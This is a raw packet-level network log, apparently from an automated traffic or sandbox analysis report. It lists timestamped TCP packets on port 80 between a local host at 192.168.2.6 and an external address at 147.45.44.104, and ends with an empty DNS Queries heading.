Sep 4, 2024 17:37:10.812772036 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.812788963 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.812809944 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.813602924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.813611031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.813642979 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.813654900 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.813745975 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.813785076 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.813851118 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.813862085 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.813885927 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.813899994 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.814033031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.814048052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.814058065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.814069986 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.814071894 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.814088106 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.814111948 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.814353943 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.814366102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.814373970 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.814384937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.814393044 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.814399958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.814403057 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.814414024 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.814420938 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.814424038 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.814431906 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.814451933 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.814483881 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.814496040 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.814528942 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.814623117 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.814635038 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.814662933 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.814682961 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.815038919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815048933 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815057993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815068960 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815077066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815078020 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.815087080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815087080 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.815108061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.815129042 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.815217018 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815226078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815234900 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815254927 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.815265894 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.815397978 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815407991 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815417051 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815440893 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.815453053 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.815526962 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815536976 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815545082 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815567017 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.815578938 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.815655947 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815668106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815676928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815686941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815696955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815699100 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.815706968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815716982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815718889 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.815733910 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.815747976 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.815820932 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815922022 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815932989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815943956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815953970 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815957069 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.815963030 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815964937 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.815973997 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815983057 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815987110 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.815993071 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.815998077 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.816003084 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816011906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816013098 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.816040993 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.816040993 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.816330910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816342115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816350937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816371918 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.816385031 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.816514015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816529036 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816538095 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816548109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816557884 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816562891 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.816582918 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.816597939 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.816806078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816817045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816829920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816838980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816848040 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816849947 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.816858053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816868067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816871881 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.816878080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816879988 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.816889048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816898108 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816905022 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.816909075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816926956 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.816940069 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.816946983 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816958904 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816965103 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816972971 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816983938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.816992998 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.816999912 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.817024946 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.817127943 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.817137957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.817147017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.817157984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.817158937 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.817167997 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.817171097 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.817178965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.817186117 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.817188978 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.817195892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.817203045 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.817207098 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.817217112 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.817219019 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.817229986 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.817240000 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.817240953 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.817255974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.817259073 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.817265034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.817275047 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.817303896 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.858118057 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.858129025 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.858136892 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.858145952 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.858158112 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.858167887 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.858177900 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.858217955 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.858257055 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.858258009 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.858267069 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.858278036 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.858299971 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.858311892 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.858433962 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.858450890 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.858468056 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.858486891 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.858603954 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.858618021 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.858625889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.858644009 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.858658075 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.858803034 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.858814001 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.858823061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.858833075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.858850002 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.858864069 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.859098911 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.859112978 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.859123945 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.859133005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.859137058 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.859143019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.859153032 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.859158039 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.859163046 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.859179974 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.859205008 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.859385014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.859400034 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.859410048 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.859417915 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.859436989 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.859448910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.859559059 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.859569073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.859576941 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.859587908 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.859594107 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.859606028 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.859618902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.859735966 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.859750986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.859761000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.859770060 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.859770060 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.859786034 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.859805107 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.860608101 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.860618114 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.860626936 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.860656977 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.860668898 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.860758066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.860769987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.860778093 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.860786915 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.860795975 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.860795975 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.860804081 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.860827923 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.861112118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861126900 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861135960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861146927 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861157894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861159086 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.861169100 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.861169100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861179113 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861191988 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.861215115 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.861386061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861394882 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861402988 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861413956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861422062 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.861433983 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.861444950 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.861522913 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861534119 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861542940 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861552954 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861562014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861567020 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.861571074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861574888 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.861582994 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861601114 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.861620903 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.861648083 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861663103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861671925 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861681938 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861684084 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.861697912 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.861707926 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.861722946 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861758947 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.861779928 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861790895 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861799955 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861828089 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.861951113 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861963987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861972094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861983061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.861991882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.862001896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.862008095 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.862009048 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.862020016 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.862039089 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.862083912 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.862226009 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.862241983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.862262964 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.862287045 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.865252018 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865266085 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865279913 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865314960 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.865344048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.865402937 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865418911 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865430117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865441084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865458965 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.865484953 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.865542889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865554094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865566015 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865591049 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.865607977 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.865695953 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865709066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865719080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865729094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865735054 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.865752935 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.865782976 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.865840912 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865852118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865863085 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865873098 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865884066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865889072 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.865895987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865909100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.865911961 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.865933895 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.865962982 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.866167068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.866296053 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.866307974 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.866317987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.866332054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.866339922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.866358042 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.866375923 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.866441011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.866455078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.866466045 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.866476059 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.866493940 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.866522074 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.866888046 CEST	80	49717	147.45.44.104	192.168.2.6

DNS Queries

